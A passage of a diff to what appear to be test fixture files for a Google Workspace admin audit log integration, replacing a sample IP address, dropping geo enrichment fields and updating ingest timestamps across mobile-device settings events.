- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977356500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_DEVICE_DELETION\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_DEVICE_DELETION",
 "id": "1",
@@ -508,7 +400,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -532,35 +424,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821613500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977362400Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_UNBLOCKED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_OWNED_DEVICE_UNBLOCKED",
 "id": "1",
@@ -590,7 +464,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -614,35 +488,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821615400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977367Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"COMPANY_OWNED_DEVICE_WIPED\",\"parameters\":[{\"name\":\"COMPANY_DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "COMPANY_OWNED_DEVICE_WIPED",
 "id": "1",
@@ -672,7 +528,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -696,35 +552,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821617400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977371900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT\",\"parameters\":[{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"GROUP\"},{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"NEW_PERMISSION_GRANT_STATE\",\"value\":\"GRANTED\"},{\"name\":\"OLD_PERMISSION_GRANT_STATE\",\"value\":\"DENIED\"},{\"name\":\"PERMISSION_GROUP_NAME\",\"value\":\"LOCATION\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_APPLICATION_PERMISSION_GRANT",
 "id": "1",
@@ -754,7 +592,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -778,35 +616,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:23.821619300Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977408Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"}]}}",
 "provider": "admin",
 "action": "CHANGE_MOBILE_APPLICATION_PRIORITY_ORDER",
 "id": "1",
@@ -836,7 +656,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -860,35 +680,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821621200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977440Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
"provider": "admin",
"action":
"REMOVE_MOBILE_APPLICATION_FROM_WHITELIST", "id": "1", @@ -918,7 +720,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -942,35 +744,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821623200Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977446700Z",
+ "original":
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_APPLICATION_SETTINGS\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_MOBILE_APPLICATION_SETTINGS", "id": "1", @@ -1001,7 +785,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1025,35 +809,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821653700Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977455100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"ADD_MOBILE_APPLICATION_TO_WHITELIST\",\"parameters\":[{\"name\":\"MOBILE_APP_PACKAGE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"DISTRIBUTION_ENTITY_NAME\",\"value\":\"ANY\"},{\"name\":\"DISTRIBUTION_ENTITY_TYPE\",\"value\":\"ORG_UNIT\"}]}}",
"provider": "admin",
"action":
"ADD_MOBILE_APPLICATION_TO_WHITELIST", "id": "1", @@ -1083,7 +849,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1107,35 +873,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:23.821656800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:46.977475700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_APPROVE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "MOBILE_DEVICE_APPROVE", "id": "1", 
@@ -1166,7 +914,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1190,35 +938,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821659100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977481300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_BLOCK\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
"provider": "admin",
"action": "MOBILE_DEVICE_BLOCK",
"id": "1",
@@ -1249,7 +979,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1273,35 +1003,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821661Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977512300Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_DELETE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
"provider": "admin",
"action": "MOBILE_DEVICE_DELETE",
"id": "1",
@@ -1332,7 +1044,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1356,35 +1068,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821663Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977517500Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"MOBILE_DEVICE_WIPE\",\"parameters\":[{\"name\":\"DEVICE_ID\",\"value\":\"id\"},{\"name\":\"DEVICE_TYPE\",\"value\":\"type\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
"provider": "admin",
"action": "MOBILE_DEVICE_WIPE",
"id": "1",
@@ -1415,7 +1109,7 @@
"foo"
],
"ip": [
- "98.235.162.24"
+ "67.43.156.13"
]
},
"google_workspace": {
@@ -1439,35 +1133,17 @@
"id": "1"
},
"source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
"user": {
"name": "foo",
"id": "1",
"email": "foo@bar.com",
"domain": "bar.com"
},
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
},
"event": {
- "ingested": "2021-06-09T10:57:23.821665Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"MOBILE_SETTINGS\",\"name\":\"CHANGE_MOBILE_SETTING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}",
+ "ingested": "2021-12-09T13:38:46.977521800Z",
